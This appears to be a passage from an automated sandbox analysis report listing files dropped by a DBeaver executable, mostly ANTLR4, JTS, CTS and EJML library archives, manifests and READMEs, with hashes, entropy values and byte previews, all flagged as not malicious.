      Preview:PK........N.fW................META-INF/MANIFEST.MF....H.6z.f..mm._...b.... ... ...y.G.....9U..E.:7..$p.}..[.%.....~7....._......o..;..}{..?${.............c...m.8.~...c..m..Z.e....3.>...........TY..........Sf.........,.Z..>.c,....7...y^qW6..G..a.w..........}...c..........f...oP...C........q..Mag....>..^>*/o....C*...W-.o..Sx.!.O.C...................T.M..b.....$n9........}^./+..M..VY..;......y..-..{........?x~.......|4..rK...b..._~0.5?...g.P...zq.....w.Oz...d..n.?...`g39..?t~.w.}...f.[..;?...m.g.Ok........*..sq.?.>.O.......]}x.w..'.........?..M....?......;?.F._...c................-gbi...s...+...r.?....?@.....?.?........{_i.....E......1..T5~{.y.........$...//...I..!..n..6.vg......^.{[h..|...:...,.Y.....=.G....!...gQ....^.Ue<..f.....e....~s..._.h.._a..+...z=..z.M..~'..l...2.k.!.[.].].....r.~jN...;;..?.o......{.:.;....A....kC.....B.P...."...(.l .....o......2.u......J.kN..Q...5...o..n6+..........>.g]...D@...*.91....kD...+.T......v....s.!..kl.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):3688665
      Entropy (8bit):7.928564070201503
      Encrypted:false
      SSDEEP:
      MD5:8991AEE20FAEE035D1E09A9D39870908
      SHA1:367C3A7027CF0496925EA5649CF580FD12061CB0
      SHA-256:BCC775AA8FFC77D94C741219AB5684D543647D31EE356B1FB0874F67810EE56D
      SHA-512:B8D2838DC0D62F03A13A7EF8F550518BC62B162A981DBA8DDF36F3B0068B1E25941550D238D75F18C7C6547B864C1FDC942F8941D813FDEDA8420F173524BE00
      Malicious:false
      Reputation:unknown
      Preview:PK.........3.W................META-INF/MANIFEST.MF..i..l.?..#.;.t<3...*hU.D......+.}.E.O?......tUT....k.].}!.Y.U...U.g.........K.].o...?$..f. K;./n...........0q.^9..j..C3b|.9......[...W.......]$..f.o....$...K..k'aQ....W....fv..Ta.'n=t..l.......a......0...C3.}..]...../..Y...:....M.s.a..8.ak...>. s.n.../...O.m3..[....x..yY..1...?...~[./.q..U...v|..[.am.n......?.~..}c......cW...$.....3.D.......CO./..S._..7.......A.CO_....q1a...o..3..z.....U........].fZCO...i.y:....|..q../_...Vx...+\...B3...wl...|75'.....m.*...T`.DX~.p.&..g#..=..4.j.I.....2.....z.t.........+.o.;....^..F._~s....83/.?..W.VyS.cO...V......oR.......qN.?...{n.,..*.......w.....]...6....{...v............k.....=....6.0..c1.>.+.~>......xK.\^?i..x..s{..r\.....HO..."/~..o.e...s~....p.M.Tu.zb.w.e....y..7*p....}<........C+...{...4h.......HC....?..w<...)F...-..p..M.....4..P.B`CO.............M........F*......q.o.Z..f..}#..(.....Y3...k9.qX......|[.M#L.|@.f.NA...z..Ya....T:....L......i..X
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):444632
      Entropy (8bit):7.827379439207203
      Encrypted:false
      SSDEEP:
      MD5:0D73947497F663E4155DD9A4CF1BADE4
      SHA1:A54569BB1FA3F1A0DC06F7ADA70421B784E96EEA
      SHA-256:B4B1B14CF2F45ED2DC2B6C99513E650EBBB4863FC6377EA7648E367CDD55CEEB
      SHA-512:4F261EBB337998025764982F87B76164EBEF07562CEA6441BE7F267447BA282A9793CB68BD3517AC5B09F75966EB1C7D4E923EDA23E1781DF06E1FE859F4EE4C
      Malicious:false
      Reputation:unknown
      Preview:PK.........L7W................META-INF/MANIFEST.MF.....-.^f......p%b"@..2k..H.....d..y.....L... C...I.. .{......*..~...u}ZW....3...q."o........)..AvA.NQ...g.._PcZ.?.a...D..c...Ua..$}{.o...._.WF.......#.~.......k..E.|...{...E....c......QD..i.3t.>....g.<...<. ......!.....N.Pw.|..i5D]..?[.....<..~.b.(.m...*...i.zJ....*...".~}.?..|.@/M..?.^.{.?.......O....l=j..~....?..].s7VCZF....?}......A....B.{.._.............G ...g.{J..O.tX..?]......|.....^.t...Ozn.\w..UA..wC..'>................o/.......7IWS..U.U.?.!x.g.?}9..8...].?Iu8...?........Q.]..Q.u.EF.?....?....d........d.._.<|{.OM..q.}..s._...w_.....n.!.............{.....:''.y..._...R.......G...(...=,F`...0:.B..B..a.......|].W..y).....#....O...4...G&[.I.......&@:.....A./.V.<._........4x..C<..!...CPD^.....M....&.......04O...TEe...........i...X...>.h.o?.R.U..0.g....zk..R.1=.6..J.....uB..(..5Mi4?........K9`.@...|...9....3..'..i.e.N........l\.V.|...w.{....`.*.(}B..=v6.....Z.<.E.aTw..!yJJ.F./.......F.F...M
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):101658
      Entropy (8bit):7.941505364890031
      Encrypted:false
      SSDEEP:
      MD5:462BC9059128EC0E18D041F21DE081BF
      SHA1:F31E001B747C3D8651F68B896C3AD4C38F0A8DB0
      SHA-256:026F6E724C62ABA1D4AD43A50B00420D851763C0614E95DE89FC3F594553E3FD
      SHA-512:ADDA24F95BA4CAF48C537E392C3DC318D126D4F8D743BD4BAFB55D0CA93713F9E38CF8C3FD0EAF33EACCDBC41D53EFF46A68A59822BA66B3A9D483F8F6D5DAB0
      Malicious:false
      Reputation:unknown
      Preview:PK........v.bW................META-INF/MANIFEST.MF.X[s...~OU....y8.( ".]y@....x.<...M........d.3O*k.......-........q..s.......)0:...9.Zd..N.....t..Q.xF.5..9.z...<...t.7..........g.e..4?.+r.k.....alu..9Q..Yd.X.z.....j..?Z..X.Hk./i..4s.v.n...y.....:0../.H=u...U_N..8P.ON......C.b...hL...a.. .t.E...sz}..u....UFa.v.U?...G..........3vjL....U.1x......h...u...........9....,.aYo..0...c...{y./.E.]..~.n.....@..r...{.....n.5......j.&...\.!7...YC...N..>......Lu..g.....R.-}...qR...Q.z......Z....w.:KZ^To.|.A.;:...t....L..i.u.5.Q.e..Yt..x......M............4.K.~..u*..;r..:...b.. yn%..l9..Q..A.w;...7...SS3...M,^..?....Djj.<.._..G,O?R.zybjK..G.0...I7'e.....6.4\.M...0..`...`8 0.....M.||x|....-...O....~..Z....{jMn.!xFvz.3q.Z%.[.v..y[..S.i.C.CRL.e.bV0...P8...P._.).?..V.,.T.....+..CI.....v2..X.d...C....N.r#.Z'.'..A...gt....%...G....7.C.:.....e.p....1.F.d..S....{.`.....w..a.{..B}..-...]..2.uR.......0....gH(uy.og6...=...s...R..7gU.........g...y.I.yhNQ.Z...?.[.<;....5.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):55470
      Entropy (8bit):7.8841804719917965
      Encrypted:false
      SSDEEP:
      MD5:A982CA5A1BA7C92FDA02BCBE4EC334AE
      SHA1:7D0E7D9EA192CF47F83F1ABBAAA58B312A03655A
      SHA-256:337C410FAFAE1D2AACDC3EE1642CDB9C95189939167A2A85A259FF357EBB74D2
      SHA-512:C9E55EC4F09FF80AB0D6F9A57FBD4B26A3A70A2D0D6ADAA109B2DD251E57514B54EEDA9AD95CAFF8D1B0955531B3F7F8F9C0229048C0426506045445003AE2C8
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.W.r.J.}w....y....B...`....."1...RiA+.....v.mh.}..TUf..<.u4..g.,o.P.yqtwC......Y.~}w3.%.nz)t...7t.;...^`...oi...Y..Y.j..}...^.& Dw7.V...v..{..........F0.......B.#."'@y..>O...o..m. .%EP4.:-.#..^..!.=...V....-.^.hWx)...."o..Q.q..(..Q@.4.u...`.d...q+..6..0.~.'........6.&.b.D......._.S.xY..7.c.xj.a..vZD....).}c..lgE..F......8.t...t;.@n.i..w6.WB..i.R..s..U.N=.Y....d0..k...o0.(.n;........I...C......_..i.?F.q.P.$I.Ep.....EV....es8}..Q.A...L.n...M.'.--.R...Fi....n2..9^~..y...x..-.#_.gL...7......#...G.r...T..?....9p.o.So4... y...q$....M14..@...5...,a.."!D...d.jV...S...lWap}.I...r...4..w..!.w.a.<.....b...d.@..H...v.gV.......K..+v....6@.fJ.d+.Y...o/.;.}]..z.s(..E...y.u"Q.I8.........X...n......\.^.}....]...P..fW....("...I.i..V........g.EE...8.>...}X.....`{u.x}2.*.x[.u..m.....o.......(...#..y...".w2.:.A.....k._....S ..~.ti?....0.\...S.WEWw...[:....>...J...f,4......"......K....j....-i.).G....Z....=.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):694
      Entropy (8bit):4.858239362589595
      Encrypted:false
      SSDEEP:
      MD5:39ADED932C59B82FA873DE9AE59B3999
      SHA1:0F54D4632672862BE4965D61790ED63EB6B3E72D
      SHA-256:CCFE7F72DAF711F8FCAD12850C4DCDF588070B58B664C3DF944FCC6820A27371
      SHA-512:9553580914846807942AF82BD987F236EE74CF9F000A7BD863B9CF7AFDC40ADAF51654695FA4ECECC68210362DCB7B9513AA1B70B9FE768DEEEEBC0FB4723F69
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: ANTLR4 Bundle..Bundle-SymbolicName: org.jkiss.bundle.antlr4;singleton:=true..Bundle-Version: 1.0.0..Bundle-ClassPath: lib/antlr4-4.12.0.jar,lib/antlr4-runtime-4.12.0.jar..Eclipse-BundleShape: dir..Export-Package: org.antlr.v4,org.antlr.v4.analysis,org.antlr.v4.automata.. ,org.antlr.v4.misc,org.antlr.v4.parse,org.antlr.v4.semantics,org.antlr... v4.tool,org.antlr.v4.tool.ast,org.antlr.v4.runtime,org.antlr.v4.runtime.. .atn,org.antlr.v4.runtime.dfa,org.antlr.v4.runtime.misc,org.antlr.v4.ru.. ntime.tree,org.antlr.v4.runtime.tree.pattern,org.antlr.v4.runtime.tree... xpath....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):74
      Entropy (8bit):4.495804717649562
      Encrypted:false
      SSDEEP:
      MD5:EA8990BA10B0A20CF207ABF7D1615FF3
      SHA1:87F31AB66DC9127EF850171832B14B85F01AEDC7
      SHA-256:B91176731051397101F803ED51C8F51C7A11B010D15B3189CCE74235931088C8
      SHA-512:8894B37EF61922E6C2AB3B7B8F72AEADB70AF669B89B44C7A9ADB5FEC7F4AD6B66052576BC56AB86154411C2B7F4E37384EB91E982BA0995D1700FC5242ABB08
      Malicious:false
      Reputation:unknown
      Preview:artifactId=org.jkiss.bundle.antlr4.groupId=org.jkiss.bundle.version=1.0.0.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):745
      Entropy (8bit):5.037806378261793
      Encrypted:false
      SSDEEP:
      MD5:A0868CADABFFF8835CF236259F445082
      SHA1:DDC86107C746C7943BF345588B08C489B7561FFE
      SHA-256:59271CAFA804CDF422D80F9D59C66DA03C2CA79EB856E2F8F1B0A2E795D26453
      SHA-512:D6E3942E7DCE08FBBF2AC98D723FCA5FFB03BC553C201915A9712480F3FED6BBAB6312D4A6365745ED79CACC40D7A025464BE5637B933D3D17EEDE8AB7661CD2
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0". xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">. <modelVersion>4.0.0</modelVersion>. <groupId>org.jkiss.bundle</groupId>. <artifactId>org.jkiss.bundle.antlr4</artifactId>. <version>1.0.0</version>. <properties>. <tycho-version>3.0.1</tycho-version>. <eclipse-p2-repo-url>https://download.eclipse.org/releases/2023-03</eclipse-p2-repo-url>. </properties>. <repositories>. <repository>. <id>eclipse-p2-repo</id>. <url>${eclipse-p2-repo-url}</url>. <layout>p2</layout>. </repository>. </repositories>.</project>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):37
      Entropy (8bit):4.1831244885738945
      Encrypted:false
      SSDEEP:
      MD5:0BCB388ECC62593DA6BE1F1129D5EA6E
      SHA1:78F95AA0949195758073357A366DF7D6AD38C58F
      SHA-256:CF9A71722F8AA107D90D0D4329E939EADECF03E0D92F9882192B825B347FA80C
      SHA-512:66771228FFA56DFB9B44656B69AED219C0A0B7669D179CC9099BDD92231609D974E0AF7D659D28E764116DDAACBA344A94B2257C8EF4495A5B2697FD19319DFB
      Malicious:false
      Reputation:unknown
      Preview:# Bundle to bring ANTLR4 dependencies
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):2625624
      Entropy (8bit):7.934270356970482
      Encrypted:false
      SSDEEP:
      MD5:C8915DBC1FA59262AB1A8F80217FAFEE
      SHA1:860DE2CCE023B8175245FA8232B078513A0741D1
      SHA-256:D957656B132A052FA66C08B9D1A4A9A9E8275720F6F62E43C72D1DE2BFCDC388
      SHA-512:A8709AACAD1FEF8619FA1BE8EDB34E8EBB6BA2CE12B4A0DBF7346B75C7F31B993CFF22C4406DF43350E7693588BC1090B340FF16FBDEF3226A1294A9C692B499
      Malicious:false
      Reputation:unknown
      Preview:PK........r.SVY..............META-INF/MANIFEST.MFe....0...{ ./.`...lO.+...bV............g....(eu..\`..^IQG.LVUO.-N..`....a...N5:oUc..<.u..R...SO.1..\.d`{..'(.../:..R..w....H.cU{L.@.w..}.S..../PK........r.SV................META-INF/PK........r.SV................org/PK........r.SV................org/antlr/PK........r.SV................org/antlr/v4/PK........r.SV................org/antlr/v4/analysis/PK........r.SV................org/antlr/v4/automata/PK........r.SV................org/antlr/v4/codegen/PK........r.SV................org/antlr/v4/codegen/model/PK........r.SV............!...org/antlr/v4/codegen/model/chunk/PK........r.SV............ ...org/antlr/v4/codegen/model/decl/PK........r.SV................org/antlr/v4/codegen/target/PK........r.SV................org/antlr/v4/gui/PK........r.SV................org/antlr/v4/misc/PK........r.SV................org/antlr/v4/parse/PK........r.SV................org/antlr/v4/semantics/PK........r.SV................org/antlr/v4/tool/PK...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):326308
      Entropy (8bit):7.9219665078223604
      Encrypted:false
      SSDEEP:
      MD5:7FE001EAC486C91A7F168CFE7ADFB395
      SHA1:DD105CF6AC9F7417B3782C178F6DBD06BF75DF57
      SHA-256:DB353B34927D6E10CD790905CEA3C8E17283DB464DAF572E3EADBB9EE569DA34
      SHA-512:4ABB69A3C6895EDEEC64C11D61886FBEB68EDA5EBB21094F596E4F7ADD8AFA9FF049C05FA916264B9185AC9013B16D8EABF44FB65DA0B6871997C8F1473A3771
      Malicious:false
      Reputation:unknown
      Preview:PK........r.SVhp..............META-INF/MANIFEST.MF..Oo.0.....,.+.jC(K. ....VPU...&.Xu..@..w6.A%.h/9d....q.\..$...I.V>...u..p.!.}........A.Y.B..Y.[..O....B..1|....Dx..;.%D.,...ka% .i=_..Y...*m......T.*...]ju....t.J.O<B.m..++M..1s...._..F.6.Zc...c...,.>.Y.'~..8..2j....@%..'.2..H.k........h...^5"...g#+....=...g....'..$M ....V]a.uH..n.U.H$A}..$.4..X...:.}.e..t*k.T..e..B..A..9n!..6...s.&......s.".....I_..z'.^$}:G..:.!.@R.19v_.@...x5bv.5.p.TL.$Z...5..].e...iI^_.7...l.....8.f.Y..T...<.B.....l..j#$rp............=..c....q....L.t..g4..........:..PK........r.SV................META-INF/PK........r.SV................org/PK........r.SV................org/antlr/PK........r.SV................org/antlr/v4/PK........r.SV................org/antlr/v4/runtime/PK........r.SV................org/antlr/v4/runtime/atn/PK........r.SV................org/antlr/v4/runtime/dfa/PK........r.SV................org/antlr/v4/runtime/misc/PK........r.SV................org/antlr/v4/runtime
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):1757
      Entropy (8bit):5.148135207185205
      Encrypted:false
      SSDEEP:
      MD5:49E7338476B2A8A97726B7D92BB4C986
      SHA1:C5F6C5F7A14B788219BFB81C9AA5F48DAE508096
      SHA-256:A83D466FCDFECA48DC942613135E3CE5A3265829D98E91179BE00AC1E7A5BFD1
      SHA-512:66446320F529082898FE1537D5CD84BD1F001D1E5D2A205BD88B91763017FE3CD43439DDB72F89834E9A74D3AC91FD17707841E2ABDE537FE13A01C2D942BB8C
      Malicious:false
      Reputation:unknown
      Preview:# CTS [![Build Status](https://travis-ci.org/orbisgis/cts.png?branch=master)](https://travis-ci.org/orbisgis/cts)..Coordinate Transformation Suite (abridged CTS) is a library developed to.perform coordinate transformations using well known geodetic algorithms and.parameter sets. It strives to be simple, flexible and interoperable, in this.order...#### History..Originally developed by Micha.l Michaud under the name of JGeod, the library was.renamed to CTS in 2009. Today CTS is maintained by the OrbisGIS team in.collaboration with Micha.l Michaud...The new CTS has been funded by the French *Agence Nationale de la Recherche* (ANR) under.research contract ANR-08-VILL-0005-01 and the regional council of the *R.gion Pays.de La Loire* under the *Syst.me d'Orbservation G.ographique de la Ville*.(SOGVILLE) project....#### License..CTS is free software; you can redistribute it and/or modify it under the terms.of the GNU Lesser General Public License as published by the Free Software Foun
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (539)
      Category:dropped
      Size (bytes):1773
      Entropy (8bit):4.778155771329166
      Encrypted:false
      SSDEEP:
      MD5:AE53541B82B3851C47518685B37560D3
      SHA1:BC447859C6C76E7A5F9DC6D2EBA8683737F66BC0
      SHA-256:D6DEC172868C82D30A6109DE33F6F98136BF202E51E228EC0EDE33AB075E43F0
      SHA-512:A123D157FD65A5436E7EF34CB7B1549D0F8A7DFFF4E6EE6EC9597B5F9E6E5F8F2D478CA13BE4BB57DE28B36A575D553E3D24BC90D96D45327EBECE6F03627A49
      Malicious:false
      Reputation:unknown
      Preview:# JTS Topology Suite Licensing..May 30th, 2017..## Project Licenses..The Eclipse Foundation makes available all content in this project ("Content"). Unless otherwise indicated below, the Content is provided to you under the terms and conditions of either the [Eclipse Public License 1.0](https://www.eclipse.org/legal/epl-v10.html) ("EPL") or the [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License). For purposes of the EPL, "Program" will mean the Content...If you did not receive this Content directly from the Eclipse Foundation, the Content is being redistributed by another party ("Redistributor") and different terms and conditions may apply to your use of any object code in the Content. Check the Redistributor's license that was provided with the Content. If no such license exists, contact the Redistributor. Unless otherwise indicated below, the terms and conditions of the EPL still apply to any source code in the Content and such
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with very long lines (318)
      Category:dropped
      Size (bytes):2996
      Entropy (8bit):5.19665758911286
      Encrypted:false
      SSDEEP:
      MD5:9CF453F1B868FCD20F526AA3306FD200
      SHA1:8E9E361EC8795B72E6E3F203539175939457B32A
      SHA-256:C4A6E8A5A09B07852290CB22AEB333382FD058871694E4191E164EA1DF4AF10B
      SHA-512:CD9227DE53D360D749606306B02E6DDFAD0B1E4A269043F0DC8E084690C6C633736F6D55C854DB773ADB45146DD8B075311C1F4B7837C9977F17557A8D6EAC0E
      Malicious:false
      Reputation:unknown
      Preview:JTS Topology Suite.==================..The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions...![JTS logo](jts_logo.png)..[![Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)...JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation...![LocationTech](locationtech_mark.png) ..## Locations..### Code.* [GitHub Repo](https://github.com/locationtech/jts).* [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts)..### Websites.* [LocationTech Home](https://locationtech.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1027
      Entropy (8bit):5.01643380635333
      Encrypted:false
      SSDEEP:
      MD5:A6245137D276609ED7228140D95E214E
      SHA1:5823FC4CAD79AF90641E11FE8B6423319E86BA83
      SHA-256:840F2C17DEBC2150EA8099730A18576BC24A787DE04C0DAD94EEE61086259649
      SHA-512:A240D1DD0A737C6F393E3E57B0757135B3C05E523FBC8BF55D34E16FC476B7A3B72124997177FD81A3E3ED8917CE3185E97F65C757FF35C958479D3AEF76865D
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: GIS bundle..Bundle-SymbolicName: org.jkiss.bundle.gis;singleton:=true..Bundle-Version: 2.0.7..Bundle-ClassPath: lib/cts-1.5.2.jar,lib/ejml-core-0.41.jar,lib/ejml-dden.. se-0.41.jar,lib/json-simple-1.1.1.jar,lib/jts-core-1.19.0.jar,lib/jts-i.. o-common-1.19.0.jar,lib/wkg-0.1-SNAPSHOT.jar,...Bundle-RequiredExecutionEnvironment: JavaSE-1.8..Bundle-Vendor: DBeaver Corp, Locationtech.org, CTS.org..Eclipse-BundleShape: dir..Export-Package: org.locationtech.jts,org.locationtech.jts.algorithm,org... locationtech.jts.geom,org.locationtech.jts.geom.impl,org.locationtech.j.. ts.io,org.locationtech.jts.io.geojson,org.locationtech.jts.io.twkb,org... cts,org.cts.crs,org.cts.cs,org.cts.datum,org.cts.op,org.cts.op.projecti.. on,org.cts.parser,org.cts.registry,org.cts.units,org.cts.util,org.cugos.. .wkg,org.ejml.data,org.ejml.dense.row.decomposition.lu,org.ejml.dense.r.. ow.linsol.lu..Im
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):71
      Entropy (8bit):4.457423486850864
      Encrypted:false
      SSDEEP:
      MD5:A93BFB8309CF4B1B5FB6A3C4FDB5E0FC
      SHA1:35E2C20B6AFC380FE24DA493D3495E8AA09488E4
      SHA-256:4EA140DA5151DB2A57527403084CE0DE3B5A05F9B63A24852F92EC1B296AA18E
      SHA-512:DB89118AFC372B873319B465C924FCEDA0A26C672754242F6942F2AAB25A4C909C5E65A2F1B798B59996089178774E8A234A2464B7F87CECDF547ABEA8C36A9E
      Malicious:false
      Reputation:unknown
      Preview:artifactId=org.jkiss.bundle.gis.groupId=org.jkiss.bundle.version=2.0.7.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):2188
      Entropy (8bit):4.75197831807768
      Encrypted:false
      SSDEEP:
      MD5:98A40B81C1DBE03F460A4B7DC721108D
      SHA1:2962BC4A0B4CC663F141BFF001A2707545266D8C
      SHA-256:D701B6FB36614F681021AB1F643BB9C2E6A58AB6F9BD84DF265AE4B60995EDC0
      SHA-512:7F9D249B887F44EB0AFEE8BD75AA69C82E77B434ADBFC82915B951E98B049EDA241ABE082D68A8A40D8ED685726129DF9822160F78008987DEB25A499F4C96C8
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0". xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">. <modelVersion>4.0.0</modelVersion>. <groupId>org.jkiss.bundle</groupId>. <artifactId>org.jkiss.bundle.gis</artifactId>. <version>2.0.7</version>. <properties>. <tycho-version>3.0.1</tycho-version>. <eclipse-p2-repo-url>https://download.eclipse.org/releases/2023-03</eclipse-p2-repo-url>. </properties>. <dependencies>. <dependency>. <groupId>org.slf4j</groupId>. <artifactId>slf4j-api</artifactId>. <version>2.0.9</version>. <scope>compile</scope>. </dependency>. <dependency>. <groupId>org.apache.aries.spifly</groupId>. <artifactId>org.apache.aries.spifly.dynamic.bundle</artifactId>. <version>1.3.7</version>. <scope>compile</scope>. </dependency>. <dependency>. <groupId>or
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):55
      Entropy (8bit):4.27238301425755
      Encrypted:false
      SSDEEP:
      MD5:C37432A6E1638FC01C32414236785658
      SHA1:6E25C345663BA6D1DABA0A173C37387332104D6A
      SHA-256:AAA28E92DBD40860F46C33265446894C0573649185245359A0BD3D94F23DD593
      SHA-512:53FA7D065CE4551B01E1B3C8AC50A57899C9AE23CC3BD807CF7E7A995B87953E0B9D26BF07AA900F1E1623EEE78DAEA608E255D4D09624618984D4DFFA07A956
      Malicious:false
      Reputation:unknown
      Preview:# eclipse-bundle-gis.Eclipse bundle with GIS libraries.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):496554
      Entropy (8bit):7.954135115290793
      Encrypted:false
      SSDEEP:
      MD5:5FA4C2250331D32C7A117811874C5557
      SHA1:16E55420FE42D18B20F77C00CE726AED5CDAF181
      SHA-256:72F8B1FBB59FE777DD1CBD618D39E22AB28436FA0843979C6120BD6CD5833E0E
      SHA-512:D8089704061B389C0E736A7C34AEF9823EF33415C3319442E0F1B12B9FF58CE6B0E0E4D4B24639A71121E62AA817BD854F160A10AC11B00C24F540B6BDE402B3
      Malicious:false
      Reputation:unknown
      Preview:PK........]CgN................META-INF/......PK..............PK........]CgN................META-INF/MANIFEST.MF.VKo.0..W.?X.V .!.l[P.[...JU.n/{X.x......(.~...Hi#!9...............z$.......f.Ps1..Q.............R!y.....W..7..VR.]..].9.......64"qY..........h.3.".T....F..8....DXR9#.H16.,..9H...i....$.1.q;...V..,.q.$oJ/..@sp"$LF..7.-a.......C,8K.#..1...X.#N".A&...XB.P..6.j...b.....7C....zd.\.k.....f,l$,.....AY.1.T.mZr..-.%.yN.t.b.u..y...........JF.x..p.A.<...+(.....<*..s..d`.9....HX8.2dsPdeO.d....{O.q.'...h........@o..h..V.S,.wS...y..-5..;...R%....Q$."-...........C ...h...a.c!...g.>.p..3.8i...p.*.....C...^....7E....qY..S(t..._.@'....IV.L.#4.+K>S..~}...._@.>.....+.......y.3T...B]...n.ox......G..Q..R...>1.G... N...q....=[....W.%.......?G.M......c.._*.4.,ac!..].q.S...... Q.o........]...}@..=..G........i.W..u...+g..PK.....Y....=...PK........]CgN................META-INF/maven/..PK..............PK........]CgN................META-INF/maven/org.orbisgis/..PK..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):259045
      Entropy (8bit):7.918314088996941
      Encrypted:false
      SSDEEP:
      MD5:200146F623A8EB87196BBC35CAE6C2B1
      SHA1:92AC2BEE332A5697C42E576B94D563BA8C25877C
      SHA-256:8D36469E8414D79C875DEFC0AF3B980525D384761C9471D15A4F365B936DD1D5
      SHA-512:7323792061AB218E43BCA7E4BF3149C28B863B39A43EFEFC02BAE15DE498FF67D6A7A33CB8969CF0C58B7F6DD27FD017BFE086309EC572903C29064392BBAD7C
      Malicious:false
      Reputation:unknown
      Preview:PK.........I.R................META-INF/..PK.........I.R................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK.........I.R................org/..PK.........I.R................org/ejml/..PK.........I.R.?.B8.......%...org/ejml/LinearSolverSparseSafe.class.VmW.G.~&AB.EE[Z.(X[.......i.....&...u......l<.7.........CO?.G....a.n...C..{..<..........z..Dc.3p...G7.S..e}#{gu....y.n...h*].c......0.N7.....egKV.N.a?5..t.fY...H.....h.].Y.5....z..mi...8..Q.C8&pa_...[.5k.2.3....~......47...te..(]..Q.O.}....| 0.....=G...1...y.).5[:......0{...1....A7.Q......CM.4.Nt.KWY..>...}.=..y..S.....~hI.r.)A.l9o..'..{.e........2..D..,..k|I`9.!...../hM.2.b..!b...s..4r,".......K.......c.t.2.[...Z..@>..z.....E..^.<...e~I.o7..Q40.y.c...jn.1K...s.r.Z..2......!..e.+...\......t..n..w. .'......=....+T.ek..yK.W.w..+.\..+..Q.R..k.]k.\.?...m....Wr>..g....:. ..1{.e.....0H..v.(JA....y1......5...6.nm..N..R.PB.]...c=..>.(.x.-W5....'..#...m*N.sK.R..`..'.r[..O..3,.S.S.G...0.8)...?[.T..0.T(bUV..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):408061
      Entropy (8bit):7.960632673418627
      Encrypted:false
      SSDEEP:
      MD5:2128D09683D0ED77429FAC23F64E42C7
      SHA1:782C80D4C3C8A3432C4641F24C177F336A360F9C
      SHA-256:355347E9CAC7E96D5D724D331A9B04BB14A8A02E1D111F1AC51C79F25D937123
      SHA-512:CB9051EC9960AED53B060728B0D3588717EFE191D37F1F5BCC7D8CC77689DD41550EB1F87750F752E92E47FACD129D26B7E512E1F52B03251F4204D2FE9A2A21
      Malicious:false
      Reputation:unknown
